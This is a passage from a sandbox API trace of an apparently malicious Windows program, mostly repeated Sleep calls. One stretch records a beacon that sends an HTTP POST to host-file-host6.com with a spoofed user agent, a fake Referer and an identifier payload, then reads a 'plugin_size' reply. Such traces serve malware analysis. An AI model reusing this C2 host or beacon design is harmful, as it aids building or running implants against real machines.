(dwMilliseconds=0x258) [0190.828] Sleep (dwMilliseconds=0x258) [0190.874] Sleep (dwMilliseconds=0x258) [0190.922] Sleep (dwMilliseconds=0x258) [0190.962] Sleep (dwMilliseconds=0x258) [0190.967] Sleep (dwMilliseconds=0x258) [0191.012] Sleep (dwMilliseconds=0x258) [0191.051] Sleep (dwMilliseconds=0x258) [0191.061] Sleep (dwMilliseconds=0x258) [0191.078] Sleep (dwMilliseconds=0x258) [0191.140] Sleep (dwMilliseconds=0x258) [0191.169] Sleep (dwMilliseconds=0x258) [0191.186] Sleep (dwMilliseconds=0x258) [0191.234] Sleep (dwMilliseconds=0x258) [0191.254] Sleep (dwMilliseconds=0x258) [0191.265] Sleep (dwMilliseconds=0x258) [0191.294] Sleep (dwMilliseconds=0x258) [0191.344] Sleep (dwMilliseconds=0x258) [0191.390] Sleep (dwMilliseconds=0x258) [0191.437] Sleep (dwMilliseconds=0x258) [0191.483] Sleep (dwMilliseconds=0x258) [0191.523] Sleep (dwMilliseconds=0x258) [0191.527] Sleep (dwMilliseconds=0x258) [0191.547] Sleep (dwMilliseconds=0x258) [0191.590] Sleep (dwMilliseconds=0x258) [0191.642] Sleep (dwMilliseconds=0x258) [0191.744] Sleep (dwMilliseconds=0x258) [0191.798] Sleep (dwMilliseconds=0x258) [0191.844] Sleep (dwMilliseconds=0x258) [0191.888] Sleep (dwMilliseconds=0x258) [0191.938] Sleep (dwMilliseconds=0x258) [0191.983] Sleep (dwMilliseconds=0x258) [0192.013] Sleep (dwMilliseconds=0x258) [0192.032] Sleep (dwMilliseconds=0x258) [0192.077] Sleep (dwMilliseconds=0x258) [0192.116] Sleep (dwMilliseconds=0x258) [0192.121] Sleep (dwMilliseconds=0x258) [0192.172] Sleep (dwMilliseconds=0x258) [0192.216] Sleep (dwMilliseconds=0x258) [0192.472] Sleep (dwMilliseconds=0x258) [0192.542] Sleep (dwMilliseconds=0x258) [0192.594] Sleep (dwMilliseconds=0x258) [0192.631] Sleep (dwMilliseconds=0x258) [0192.637] Sleep (dwMilliseconds=0x258) [0192.715] Sleep (dwMilliseconds=0x258) [0192.755] Sleep (dwMilliseconds=0x258) [0192.765] Sleep (dwMilliseconds=0x258) [0192.781] Sleep (dwMilliseconds=0x258) [0192.827] Sleep (dwMilliseconds=0x258) [0192.854] Sleep (dwMilliseconds=0x258) [0192.858] Sleep (dwMilliseconds=0x258) [0192.887] Sleep (dwMilliseconds=0x258) [0193.187] Sleep (dwMilliseconds=0x258) [0193.215] Sleep (dwMilliseconds=0x258) [0193.250] Sleep (dwMilliseconds=0x258) [0193.293] Sleep (dwMilliseconds=0x258) [0193.359] Sleep (dwMilliseconds=0x258) [0193.403] Sleep (dwMilliseconds=0x258) [0193.501] Sleep (dwMilliseconds=0x258) [0193.568] Sleep (dwMilliseconds=0x258) [0193.614] Sleep (dwMilliseconds=0x258) [0193.621] Sleep (dwMilliseconds=0x258) [0193.657] Sleep (dwMilliseconds=0x258) [0193.745] Sleep (dwMilliseconds=0x258) [0193.779] Sleep (dwMilliseconds=0x258) [0193.797] Sleep (dwMilliseconds=0x258) [0193.844] RtlAllocateHeap (HeapHandle=0x8000000, Flags=0x8, Size=0x24) returned 0x8001840 [0193.844] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\wvhwbfa" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\wvhwbfa"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0193.844] RtlRandom (in: Seed=0x550e9e | out: Seed=0x550e9e) returned 0xc212ef94 [0193.844] RtlAllocateHeap (HeapHandle=0x8000000, Flags=0x8, Size=0x68) returned 0x8001890 [0193.844] RtlRandom (in: Seed=0x550e9e | out: Seed=0x550e9e) returned 0xa1ec10c [0193.845] RtlRandom (in: Seed=0x550e9e | out: Seed=0x550e9e) returned 0xc796fc0a [0193.845] RtlRandom (in: Seed=0x550e9e | out: Seed=0x550e9e) returned 0x280d7f1 [0193.845] RtlRandom (in: Seed=0x550e9e | out: Seed=0x550e9e) returned 0xa6126f51 [0193.845] RtlRandom (in: Seed=0x550e9e | out: Seed=0x550e9e) returned 0xb2488745 [0193.845] RtlRandom (in: Seed=0x550e9e | out: Seed=0x550e9e) returned 0xe77bc0b9 [0193.845] RtlRandom (in: Seed=0x550e9e | out: Seed=0x550e9e) returned 0x99de1cef [0193.845] RtlRandom (in: Seed=0x550e9e | out: Seed=0x550e9e) returned 0x14fc1619 [0193.845] RtlRandom (in: Seed=0x550e9e | out: Seed=0x550e9e) returned 0x4487d00f [0193.845] RtlRandom (in: Seed=0x550e9e | out: Seed=0x550e9e) returned 0x2a7d1e5b [0193.845] RtlRandom (in: Seed=0x550e9e | out: Seed=0x550e9e) returned 0xc345ee84 [0193.845] RtlRandom (in: Seed=0x550e9e | out: Seed=0x550e9e) returned 0xb63447c6 [0193.845] RtlRandom (in: Seed=0x550e9e | out: Seed=0x550e9e) returned 0xdf2b0ffb [0193.845] RtlRandom (in: Seed=0x550e9e | out: Seed=0x550e9e) returned 0x5a9939c8 [0193.845] RtlRandom (in: Seed=0x550e9e | out: Seed=0x550e9e) returned 0x79a64308 [0193.845] RtlRandom (in: Seed=0x550e9e | out: Seed=0x550e9e) returned 0x86735526 [0193.845] RtlRandom (in: Seed=0x550e9e | out: Seed=0x550e9e) returned 0x78e2372f [0193.845] RtlRandom (in: Seed=0x550e9e | out: Seed=0x550e9e) returned 0xa3004f70 [0193.845] RtlRandom (in: Seed=0x550e9e | out: Seed=0x550e9e) returned 0x5cf695ae [0193.845] RtlRandom (in: Seed=0x550e9e | out: Seed=0x550e9e) returned 0x523b9e45 [0193.845] RtlRandom (in: Seed=0x550e9e | out: Seed=0x550e9e) returned 0x7d8c6fca [0193.845] RtlRandom (in: Seed=0x550e9e | out: Seed=0x550e9e) returned 0xe6b8ed7b [0193.845] RtlRandom (in: Seed=0x550e9e | out: Seed=0x550e9e) returned 0x9e5f7b3a [0193.845] RtlRandom (in: Seed=0x550e9e | out: Seed=0x550e9e) returned 0xdb51d33d [0193.845] RtlRandom (in: Seed=0x550e9e | out: Seed=0x550e9e) returned 0x752c7e94 [0193.845] RtlRandom (in: Seed=0x550e9e | out: Seed=0x550e9e) returned 0xa2affd24 [0193.845] RtlRandom (in: Seed=0x550e9e | out: Seed=0x550e9e) returned 0x963a453 [0193.845] RtlRandom (in: Seed=0x550e9e | out: Seed=0x550e9e) returned 0xda100c52 [0193.845] RtlRandom (in: Seed=0x550e9e | out: Seed=0x550e9e) returned 0x91040cbf [0193.845] RtlRandom (in: Seed=0x550e9e | out: Seed=0x550e9e) returned 0xf88dbf4e [0193.845] RtlRandom (in: Seed=0x550e9e | out: Seed=0x550e9e) returned 0xd96502aa [0193.845] RtlRandom (in: Seed=0x550e9e | out: Seed=0x550e9e) returned 0x57eebe1f [0193.845] RtlRandom (in: Seed=0x550e9e | out: Seed=0x550e9e) returned 0xa98d8180 [0193.845] RtlRandom (in: Seed=0x550e9e | out: Seed=0x550e9e) returned 0x4763b383 [0193.845] RtlRandom (in: Seed=0x550e9e | out: Seed=0x550e9e) returned 0xd1d998d [0193.846] RtlRandom (in: Seed=0x550e9e | out: Seed=0x550e9e) returned 0xa12a6171 [0193.846] RtlRandom (in: Seed=0x550e9e | out: Seed=0x550e9e) returned 0x68b25614 [0193.846] RtlRandom (in: Seed=0x550e9e | out: Seed=0x550e9e) returned 0x587c2f57 [0193.846] RtlRandom (in: Seed=0x550e9e | out: Seed=0x550e9e) returned 0x42a9ee3c [0193.846] RtlRandom (in: Seed=0x550e9e | out: Seed=0x550e9e) returned 0x99ee1c14 [0193.846] RtlRandom (in: Seed=0x550e9e | out: Seed=0x550e9e) returned 0xf9a09a9a [0193.846] RtlRandom (in: Seed=0x550e9e | out: Seed=0x550e9e) returned 0x92a6b7a8 [0193.846] RtlRandom (in: Seed=0x550e9e | out: Seed=0x550e9e) returned 0x189bec5c [0193.846] RtlRandom (in: Seed=0x550e9e | out: Seed=0x550e9e) returned 0x2bb6cef3 [0193.846] RtlRandom (in: Seed=0x550e9e | out: Seed=0x550e9e) returned 0x67960fef [0193.846] RtlRandom (in: Seed=0x550e9e | out: Seed=0x550e9e) returned 0x9c5a728f [0193.846] RtlRandom (in: Seed=0x550e9e | out: Seed=0x550e9e) returned 0xb3670f40 [0193.846] RtlRandom (in: Seed=0x550e9e | out: Seed=0x550e9e) returned 0x36f4f9b9 [0193.846] RtlRandom (in: Seed=0x550e9e | out: Seed=0x550e9e) returned 0xf63308dc [0193.846] RtlRandom (in: Seed=0x550e9e | out: Seed=0x550e9e) returned 0x10aee165 [0193.846] RtlRandom (in: Seed=0x550e9e | out: Seed=0x550e9e) returned 0x395ec42e [0193.846] RtlRandom (in: Seed=0x550e9e | out: Seed=0x550e9e) returned 0x6013bcfa [0193.846] RtlRandom (in: Seed=0x550e9e | out: Seed=0x550e9e) returned 0x38899cd3 [0193.846] RtlRandom (in: Seed=0x550e9e | out: Seed=0x550e9e) returned 0xa50a38b [0193.846] RtlRandom (in: Seed=0x550e9e | out: Seed=0x550e9e) returned 0xde0070ff [0193.846] RtlRandom (in: Seed=0x550e9e | out: Seed=0x550e9e) returned 0xd26ba36b [0193.846] RtlRandom (in: Seed=0x550e9e | out: Seed=0x550e9e) returned 0x1b2b5ae3 [0193.846] RtlRandom (in: Seed=0x550e9e | out: Seed=0x550e9e) returned 0x852e4525 [0193.846] RtlRandom (in: Seed=0x550e9e | out: Seed=0x550e9e) returned 0x38e7a636 [0193.846] RtlRandom (in: Seed=0x550e9e | out: Seed=0x550e9e) returned 0x721b178a [0193.846] RtlRandom (in: Seed=0x550e9e | out: Seed=0x550e9e) returned 0xda694dcd [0193.846] RtlRandom (in: Seed=0x550e9e | out: Seed=0x550e9e) returned 0x5f4abff4 [0193.846] RtlRandom (in: Seed=0x550e9e | out: Seed=0x550e9e) returned 0x26ed64e3 [0193.846] RtlRandom (in: Seed=0x550e9e | out: Seed=0x550e9e) returned 0x6fd7ff66 [0193.846] RtlRandom (in: Seed=0x550e9e | out: Seed=0x550e9e) returned 0xee956958 [0193.846] RtlRandom (in: Seed=0x550e9e | out: Seed=0x550e9e) returned 0x91d1147d [0193.846] RtlRandom (in: Seed=0x550e9e | out: Seed=0x550e9e) returned 0xe6407a60 [0193.846] RtlRandom (in: Seed=0x550e9e | out: Seed=0x550e9e) returned 0x470e73b8 [0193.846] RtlRandom (in: Seed=0x550e9e | out: Seed=0x550e9e) returned 0x8c8d607f [0193.846] RtlRandom (in: Seed=0x550e9e | out: Seed=0x550e9e) returned 0x11271bc2 [0193.847] RtlRandom (in: Seed=0x550e9e | out: Seed=0x550e9e) returned 0x80cadfa [0193.847] RtlRandom (in: Seed=0x550e9e | out: Seed=0x550e9e) returned 0xf73eba8b [0193.847] RtlRandom (in: Seed=0x550e9e | out: Seed=0x550e9e) returned 0x5a329309 [0193.847] RtlRandom (in: Seed=0x550e9e | out: Seed=0x550e9e) returned 0x4c7c3fb6 [0193.847] RtlRandom (in: Seed=0x550e9e | out: Seed=0x550e9e) returned 0x35f800ff [0193.847] RtlRandom (in: Seed=0x550e9e | out: Seed=0x550e9e) returned 0xe980c24c [0193.847] RtlRandom (in: Seed=0x550e9e | out: Seed=0x550e9e) returned 0xc5c9930c [0193.847] RtlRandom (in: Seed=0x550e9e | out: Seed=0x550e9e) returned 0x52fa40a0 [0193.847] RtlRandom (in: Seed=0x550e9e | out: Seed=0x550e9e) returned 0x5ff07ee1 [0193.847] RtlRandom (in: Seed=0x550e9e | out: Seed=0x550e9e) returned 0xea1e1795 [0193.847] RtlRandom (in: Seed=0x550e9e | out: Seed=0x550e9e) returned 0x4f0f1ced [0193.847] RtlRandom (in: Seed=0x550e9e | out: Seed=0x550e9e) returned 0xee8104b7 [0193.847] RtlRandom (in: Seed=0x550e9e | out: Seed=0x550e9e) returned 0x3d5b76af [0193.847] RtlRandom (in: Seed=0x550e9e | out: Seed=0x550e9e) returned 0x676ea5f6 [0193.847] RtlRandom (in: Seed=0x550e9e | out: Seed=0x550e9e) returned 0x9e669933 [0193.847] RtlRandom (in: Seed=0x550e9e | out: Seed=0x550e9e) returned 0x31daf0fd [0193.847] RtlRandom (in: Seed=0x550e9e | out: Seed=0x550e9e) returned 0x98971a8f [0193.847] RtlRandom (in: Seed=0x550e9e | out: Seed=0x550e9e) returned 0x89330cb1 [0193.847] RtlRandom (in: Seed=0x550e9e | out: Seed=0x550e9e) returned 0x8510e770 [0193.847] RtlRandom (in: Seed=0x550e9e | out: Seed=0x550e9e) returned 0xb7a0a842 [0193.847] RtlRandom (in: Seed=0x550e9e | out: Seed=0x550e9e) returned 0xb84da1de [0193.847] RtlRandom (in: Seed=0x550e9e | out: Seed=0x550e9e) returned 0xbf2d7be1 [0193.847] RtlRandom (in: Seed=0x550e9e | out: Seed=0x550e9e) returned 0x45dd4f3e [0193.847] RtlRandom (in: Seed=0x550e9e | out: Seed=0x550e9e) returned 0x3febf4cd [0193.847] RtlRandom (in: Seed=0x550e9e | out: Seed=0x550e9e) returned 0xcf15f26f [0193.847] RtlAllocateHeap (HeapHandle=0x8000000, Flags=0x8, Size=0xb7) returned 0x8001900 [0193.847] lstrcatA (in: lpString1="", lpString2="FE7F15060B875FB9FB2A49F08D5D03120C287F38" | out: lpString1="FE7F15060B875FB9FB2A49F08D5D03120C287F38") returned="FE7F15060B875FB9FB2A49F08D5D03120C287F38" [0193.847] lstrcatA (in: lpString1="", lpString2="XC64ZB" | out: lpString1="XC64ZB") returned="XC64ZB" [0193.847] lstrcatA (in: lpString1="", lpString2="pub2" | out: lpString1="pub2") returned="pub2" [0193.847] lstrcatA (in: lpString1="", lpString2="S;\"^R,xpT$CG(S#-L9OVef/2]wX=(yITiNTt[^GCKQ-zZV1zv9\\:(2-U/zw<," | out: lpString1="S;\"^R,xpT$CG(S#-L9OVef/2]wX=(yITiNTt[^GCKQ-zZV1zv9\\:(2-U/zw<,") returned="S;\"^R,xpT$CG(S#-L9OVef/2]wX=(yITiNTt[^GCKQ-zZV1zv9\\:(2-U/zw<," [0193.847] RtlAllocateHeap (HeapHandle=0x8000000, Flags=0x8, Size=0x10c) returned 0x80019c0 [0193.847] lstrlenA (lpString="http://host-file-host6.com/") returned 27 [0193.848] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x8001840, cbMultiByte=28, lpWideCharStr=0x80019c0, cchWideChar=56 | out: lpWideCharStr="http://host-file-host6.com/") returned 28 [0193.848] WinHttpGetIEProxyConfigForCurrentUser (in: pProxyConfig=0xfeefc18 | out: pProxyConfig=0xfeefc18) returned 1 [0193.912] WinHttpOpen (pszAgentW="Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko", dwAccessType=0x0, pszProxyW=0x0, pszProxyBypassW=0x0, dwFlags=0x0) returned 0xa32f380 [0193.914] WinHttpCrackUrl (in: pwszUrl="http://host-file-host6.com/", dwUrlLength=0x0, dwFlags=0x0, lpUrlComponents=0xfeefcd0 | out: lpUrlComponents=0xfeefcd0) returned 1 [0193.914] WinHttpConnect (hSession=0xa32f380, pswzServerName="host-file-host6.com", nServerPort=0x50, dwReserved=0x0) returned 0xa092bd0 [0193.914] RtlAllocateHeap (HeapHandle=0x8000000, Flags=0x8, Size=0x12) returned 0x8001ae0 [0193.914] RtlAllocateHeap (HeapHandle=0x8000000, Flags=0x8, Size=0x68) returned 0x8001b00 [0193.914] WinHttpOpenRequest (hConnect=0xa092bd0, pwszVerb="POST", pwszObjectName="/", pwszVersion=0x0, pwszReferrer=0x0, ppwszAcceptTypes=0x0, dwFlags=0x0) returned 0xa460dd0 [0193.914] RtlAllocateHeap (HeapHandle=0x8000000, Flags=0x8, Size=0x4e) returned 0x8001b70 [0193.914] RtlAllocateHeap (HeapHandle=0x8000000, Flags=0x8, Size=0x10d) returned 0x8001bd0 [0193.914] RtlRandom (in: Seed=0x550e9e | out: Seed=0x550e9e) returned 0x40bd1d0e [0193.914] RtlAllocateHeap (HeapHandle=0x8000000, Flags=0x8, Size=0x12) returned 0x8001cf0 [0193.914] RtlAllocateHeap (HeapHandle=0x8000000, Flags=0x8, Size=0x17) returned 0x8001d10 [0193.914] RtlRandom (in: Seed=0x550e9e | out: Seed=0x550e9e) returned 0x49e9f848 [0193.915] RtlRandom (in: Seed=0x550e9e | out: Seed=0x550e9e) returned 0x818aa412 [0193.915] RtlRandom (in: Seed=0x550e9e | out: Seed=0x550e9e) returned 0xa6d16f1 [0193.915] RtlRandom (in: Seed=0x550e9e | out: Seed=0x550e9e) returned 0x96df235c [0193.915] RtlRandom (in: Seed=0x550e9e | out: Seed=0x550e9e) returned 0x412b398f [0193.915] RtlRandom (in: Seed=0x550e9e | out: Seed=0x550e9e) returned 0x4ad3eaac [0193.915] RtlRandom (in: Seed=0x550e9e | out: Seed=0x550e9e) returned 0xb7352087 [0193.915] RtlRandom (in: Seed=0x550e9e | out: Seed=0x550e9e) returned 0xb8f67f7f [0193.915] wsprintfW (in: param_1=0x8001bd0, param_2="Accept: */*\r\nReferer: http://%S%s/" | out: param_1="Accept: */*\r\nReferer: http://jhfxgno.net/") returned 41 [0193.915] RtlSizeHeap (HeapHandle=0x8000000, Flags=0x0, MemoryPointer=0x8001d10) returned 0x17 [0193.915] RtlFreeHeap (HeapHandle=0x8000000, Flags=0x0, BaseAddress=0x8001d10) returned 1 [0193.915] RtlSizeHeap (HeapHandle=0x8000000, Flags=0x0, MemoryPointer=0x8001cf0) returned 0x12 [0193.915] RtlFreeHeap (HeapHandle=0x8000000, Flags=0x0, BaseAddress=0x8001cf0) returned 1 [0193.915] RtlSizeHeap (HeapHandle=0x8000000, Flags=0x0, MemoryPointer=0x8001b70) returned 0x4e [0193.916] RtlFreeHeap (HeapHandle=0x8000000, Flags=0x0, BaseAddress=0x8001b70) returned 1 [0193.916] WinHttpAddRequestHeaders (hRequest=0xa460dd0, pwszHeaders="Accept: */*\r\nReferer: http://jhfxgno.net/", dwHeadersLength=0xffffffff, dwModifiers=0x20000000) returned 1 [0193.916] WinHttpSendRequest (hRequest=0xa460dd0, lpszHeaders="Content-Type: application/x-www-form-urlencoded", dwHeadersLength=0x0, lpOptional=0x8001900*, dwOptionalLength=0xae, dwTotalLength=0xae, dwContext=0x0) returned 1 [0194.210] WinHttpReceiveResponse (hRequest=0xa460dd0, lpReserved=0x0) returned 1 [0194.210] RtlAllocateHeap (HeapHandle=0x8000000, Flags=0x8, Size=0x2800) returned 0x8001cf0 [0194.210] WinHttpReadData (in: hRequest=0xa460dd0, lpBuffer=0x8001cf0, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0xfeefd88 | out: lpBuffer=0x8001cf0*, lpdwNumberOfBytesRead=0xfeefd88*=0x18) returned 1 [0194.210] RtlReAllocateHeap (Heap=0x8000000, Flags=0x8, Ptr=0x8001cf0, Size=0x5000) returned 0x8001cf0 [0194.210] WinHttpReadData (in: hRequest=0xa460dd0, lpBuffer=0x8001d08, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0xfeefd88 | out: lpBuffer=0x8001d08*, lpdwNumberOfBytesRead=0xfeefd88*=0x0) returned 1 [0194.210] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0x530000 [0194.212] RtlFreeHeap (HeapHandle=0x8000000, Flags=0x0, BaseAddress=0x8001cf0) returned 1 [0194.212] WinHttpCloseHandle (hInternet=0xa460dd0) returned 1 [0194.212] RtlSizeHeap (HeapHandle=0x8000000, Flags=0x0, MemoryPointer=0x8001bd0) returned 0x10d [0194.212] RtlFreeHeap (HeapHandle=0x8000000, Flags=0x0, BaseAddress=0x8001bd0) returned 1 [0194.212] WinHttpCloseHandle (hInternet=0xa092bd0) returned 1 [0194.212] RtlSizeHeap (HeapHandle=0x8000000, Flags=0x0, MemoryPointer=0x8001b00) returned 0x68 [0194.213] RtlFreeHeap (HeapHandle=0x8000000, Flags=0x0, BaseAddress=0x8001b00) returned 1 [0194.213] RtlSizeHeap (HeapHandle=0x8000000, Flags=0x0, MemoryPointer=0x8001ae0) returned 0x12 [0194.213] RtlFreeHeap (HeapHandle=0x8000000, Flags=0x0, BaseAddress=0x8001ae0) returned 1 [0194.213] WinHttpCloseHandle (hInternet=0xa32f380) returned 1 [0194.213] RtlSizeHeap (HeapHandle=0x8000000, Flags=0x0, MemoryPointer=0x80019c0) returned 0x10c [0194.213] RtlFreeHeap (HeapHandle=0x8000000, Flags=0x0, BaseAddress=0x80019c0) returned 1 [0194.213] RtlSizeHeap (HeapHandle=0x8000000, Flags=0x0, MemoryPointer=0x8001890) returned 0x68 [0194.213] RtlFreeHeap (HeapHandle=0x8000000, Flags=0x0, BaseAddress=0x8001890) returned 1 [0194.213] RtlSizeHeap (HeapHandle=0x8000000, Flags=0x0, MemoryPointer=0x8001900) returned 0xb7 [0194.214] RtlFreeHeap (HeapHandle=0x8000000, Flags=0x0, BaseAddress=0x8001900) returned 1 [0194.214] lstrlenA (lpString="ä\x070|:|plugin_size=0") returned 19 [0194.214] RtlAllocateHeap (HeapHandle=0x8000000, Flags=0x8, Size=0x15) returned 0x8001890 [0194.214] lstrlenA (lpString="0|:|plugin_size=0") returned 17 [0194.214] lstrlenA (lpString="plugin_size") returned 11 [0194.214] atoi (_Str="0") returned 0 [0194.214] lstrlenA (lpString="0|:|plugin_size=0") returned 17 [0194.214] lstrlenA (lpString="|:|") returned 3 [0194.214] MapViewOfFile (hFileMappingObject=0x2184, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x8070000 [0194.222] lstrcatA (in: lpString1="", lpString2="plugin_size=0" | out: lpString1="plugin_size=0") returned="plugin_size=0" [0194.222] NtUnmapViewOfSection (ProcessHandle=0xffffffffffffffff, BaseAddress=0x8070000) returned 0x0 [0194.294] atoi (_Str="0") returned 0 [0194.294] VirtualFree (lpAddress=0x530000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0194.296] RtlSizeHeap (HeapHandle=0x8000000, Flags=0x0, MemoryPointer=0x8001840) returned 0x24 [0194.296] RtlFreeHeap (HeapHandle=0x8000000, Flags=0x0, BaseAddress=0x8001840) returned 1 [0194.296] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\wvhwbfa" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\wvhwbfa"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0194.297] Sleep (dwMilliseconds=0x258) [0194.324] Sleep (dwMilliseconds=0x258) [0194.340] Sleep (dwMilliseconds=0x258) [0194.388] Sleep (dwMilliseconds=0x258) [0194.414] Sleep (dwMilliseconds=0x258) [0194.419] Sleep (dwMilliseconds=0x258) [0194.459] Sleep (dwMilliseconds=0x258) [0194.499] Sleep (dwMilliseconds=0x258) [0194.543] Sleep (dwMilliseconds=0x258) [0194.593] Sleep (dwMilliseconds=0x258) [0194.653] Sleep (dwMilliseconds=0x258) [0194.704] Sleep (dwMilliseconds=0x258) [0194.756] Sleep (dwMilliseconds=0x258) [0194.763] Sleep (dwMilliseconds=0x258) [0194.797] Sleep (dwMilliseconds=0x258) [0194.844] Sleep (dwMilliseconds=0x258) [0194.874] Sleep (dwMilliseconds=0x258) [0194.891] Sleep (dwMilliseconds=0x258) [0194.938] Sleep (dwMilliseconds=0x258) [0195.001] Sleep (dwMilliseconds=0x258) [0195.062] Sleep (dwMilliseconds=0x258) [0195.120] Sleep (dwMilliseconds=0x258) [0195.148] Sleep (dwMilliseconds=0x258) [0195.152] Sleep (dwMilliseconds=0x258) [0195.168] Sleep (dwMilliseconds=0x258) [0195.215] Sleep (dwMilliseconds=0x258) [0195.240] Sleep (dwMilliseconds=0x258) [0195.250] Sleep (dwMilliseconds=0x258) [0195.281] Sleep (dwMilliseconds=0x258) [0195.374] Sleep (dwMilliseconds=0x258) [0195.390] Sleep (dwMilliseconds=0x258) [0195.404] Sleep (dwMilliseconds=0x258) [0195.434] Sleep (dwMilliseconds=0x258) [0195.482] Sleep (dwMilliseconds=0x258) [0195.544] Sleep (dwMilliseconds=0x258) [0195.575] Sleep (dwMilliseconds=0x258) [0195.591] Sleep (dwMilliseconds=0x258) [0195.638] Sleep (dwMilliseconds=0x258) [0195.679] Sleep (dwMilliseconds=0x258) [0195.684] Sleep (dwMilliseconds=0x258) [0195.705] Sleep (dwMilliseconds=0x258) [0195.794] Sleep (dwMilliseconds=0x258) [0195.846] Sleep (dwMilliseconds=0x258) [0195.903] Sleep (dwMilliseconds=0x258) [0195.954] Sleep (dwMilliseconds=0x258) [0195.968] Sleep (dwMilliseconds=0x258) [0195.984] Sleep (dwMilliseconds=0x258) [0196.044] Sleep (dwMilliseconds=0x258) [0196.096] Sleep (dwMilliseconds=0x258) [0196.122] Sleep (dwMilliseconds=0x258) [0196.138] Sleep (dwMilliseconds=0x258) [0196.171] Sleep (dwMilliseconds=0x258) [0196.219] Sleep (dwMilliseconds=0x258) [0196.264] Sleep (dwMilliseconds=0x258) [0196.314] Sleep (dwMilliseconds=0x258) [0196.343] Sleep (dwMilliseconds=0x258) [0196.357] Sleep (dwMilliseconds=0x258) [0196.372] Sleep (dwMilliseconds=0x258) [0196.424] Sleep (dwMilliseconds=0x258) [0196.464] Sleep (dwMilliseconds=0x258) [0196.485] Sleep (dwMilliseconds=0x258) [0196.543] Sleep (dwMilliseconds=0x258) [0196.578] Sleep (dwMilliseconds=0x258) [0196.594] Sleep (dwMilliseconds=0x258) [0196.613] Sleep (dwMilliseconds=0x258) [0196.655] Sleep (dwMilliseconds=0x258) [0196.701] Sleep (dwMilliseconds=0x258) [0196.751] Sleep (dwMilliseconds=0x258) [0196.818] Sleep (dwMilliseconds=0x258) [0196.825] Sleep (dwMilliseconds=0x258) [0196.872] Sleep (dwMilliseconds=0x258) [0196.921] Sleep (dwMilliseconds=0x258) [0196.966] Sleep (dwMilliseconds=0x258) [0197.013] Sleep (dwMilliseconds=0x258) [0197.059] Sleep (dwMilliseconds=0x258) [0197.117] Sleep (dwMilliseconds=0x258) [0197.129] Sleep (dwMilliseconds=0x258) [0197.138] Sleep (dwMilliseconds=0x258) [0197.168] Sleep (dwMilliseconds=0x258) [0197.217] Sleep (dwMilliseconds=0x258) [0197.255] Sleep (dwMilliseconds=0x258) [0197.263] Sleep (dwMilliseconds=0x258) [0197.295] Sleep (dwMilliseconds=0x258) [0197.342] Sleep (dwMilliseconds=0x258) [0197.387] Sleep (dwMilliseconds=0x258) [0197.466] Sleep (dwMilliseconds=0x258) [0197.513] Sleep (dwMilliseconds=0x258) [0197.557] Sleep (dwMilliseconds=0x258) [0197.607] Sleep (dwMilliseconds=0x258) [0197.653] Sleep (dwMilliseconds=0x258) [0197.719] Sleep (dwMilliseconds=0x258) [0197.765] Sleep (dwMilliseconds=0x258) [0197.848] Sleep (dwMilliseconds=0x258) [0197.910] Sleep (dwMilliseconds=0x258) [0197.967] Sleep (dwMilliseconds=0x258) [0198.018] Sleep (dwMilliseconds=0x258) [0198.059] Sleep (dwMilliseconds=0x258) [0198.125] Sleep (dwMilliseconds=0x258) [0198.172] Sleep (dwMilliseconds=0x258) [0198.189] Sleep (dwMilliseconds=0x258) [0198.199] Sleep (dwMilliseconds=0x258) [0198.250] Sleep (dwMilliseconds=0x258) [0198.297] Sleep (dwMilliseconds=0x258) [0198.313] Sleep (dwMilliseconds=0x258) [0198.359] Sleep (dwMilliseconds=0x258) [0198.404] Sleep (dwMilliseconds=0x258) [0198.450] Sleep (dwMilliseconds=0x258) [0198.498] Sleep (dwMilliseconds=0x258) [0198.543] Sleep (dwMilliseconds=0x258) [0198.639] Sleep (dwMilliseconds=0x258) [0198.684] Sleep (dwMilliseconds=0x258) [0198.735] Sleep (dwMilliseconds=0x258) [0198.752] Sleep (dwMilliseconds=0x258) [0198.766] Sleep (dwMilliseconds=0x258) [0198.833] Sleep (dwMilliseconds=0x258) [0199.124] Sleep (dwMilliseconds=0x258) [0199.187] Sleep (dwMilliseconds=0x258) [0199.232] Sleep (dwMilliseconds=0x258) [0199.276] Sleep (dwMilliseconds=0x258) [0199.342] Sleep (dwMilliseconds=0x258) [0199.369] Sleep (dwMilliseconds=0x258) [0199.375] Sleep (dwMilliseconds=0x258) [0199.437] Sleep (dwMilliseconds=0x258) [0199.508] Sleep (dwMilliseconds=0x258) [0199.527] Sleep (dwMilliseconds=0x258) [0199.559] Sleep (dwMilliseconds=0x258) [0199.607] Sleep (dwMilliseconds=0x258) [0199.653] Sleep (dwMilliseconds=0x258) [0199.701] Sleep (dwMilliseconds=0x258) [0199.888] Sleep (dwMilliseconds=0x258) [0199.925] Sleep (dwMilliseconds=0x258) [0199.934] Sleep (dwMilliseconds=0x258) [0199.982] Sleep (dwMilliseconds=0x258) [0200.007] Sleep (dwMilliseconds=0x258) [0200.013] Sleep (dwMilliseconds=0x258) [0200.028] Sleep (dwMilliseconds=0x258) [0200.092] Sleep (dwMilliseconds=0x258) [0200.123] Sleep (dwMilliseconds=0x258) [0200.138] Sleep (dwMilliseconds=0x258) [0200.153] Sleep (dwMilliseconds=0x258) [0200.201] Sleep (dwMilliseconds=0x258) [0200.246] Sleep (dwMilliseconds=0x258) [0200.291] Sleep (dwMilliseconds=0x258) [0200.293] Sleep 